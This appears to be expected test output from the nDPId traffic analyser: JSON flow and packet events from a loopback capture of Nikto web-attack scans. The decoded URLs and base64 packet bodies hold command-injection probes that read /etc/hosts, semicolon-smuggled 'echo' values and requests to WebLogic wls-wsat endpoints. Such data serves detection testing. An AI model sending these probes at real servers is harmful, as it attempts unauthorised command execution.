+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1576420278006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278006,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/YadAAEAG2g9\/AAABfwAAAcf8H5A46lj5CJ27noAYAED\/MwAAAQEICp1nAB6dZwAeR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlMTEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} +01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007186)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7560000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1576420278008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":1576420278008,"pkt":"AAAAAAAAAAAAAAAACABFAAFD5CdAAEAGV4t\/AAABfwAAAcf+H5BRed18Cunwm4AYAED\/NwAAAQEICp1nACCdZwAfR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQzExIEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTg3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} +01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7560000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007187)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1576420278010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278010,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/OK1AAEAGAwp\/AAABfwAAAcgAH5D7EgH2VMq6xIAYAED\/MwAAAQEICp1nACKdZwAiR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlMTEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODgpDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} +01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007188)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7560000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1576420278012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1576420278012,"pkt":"AAAAAAAAAAAAAAAACABFAAFJWQ5AAEAG4p5\/AAABfwAAAcgCH5Cjm2BUk9d3uYAYAED\/PQAAAQEICp1nACSdZwAkR0VUIC9sb2dpbi5jZ2k\/Y2xpPWFhJTIwYWElMjdjYXQlMjAvZXRjL2hvc3RzIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MjM0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} +01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7560000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi?cli=aa%20aa%27cat%20\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007234)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1576420278014,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1576420278014,"pkt":"AAAAAAAAAAAAAAAACABFAAE1Ck9AAEAGMXJ\/AAABfwAAAcgEH5AitzMTI6HHCIAYAED\/KQAAAQEICp1nACadZwAmR0VUIC9zaGVsbD9jYXQrL2V0Yy9ob3N0cyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzIzNSkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat+\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007235)"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7560000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7560000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 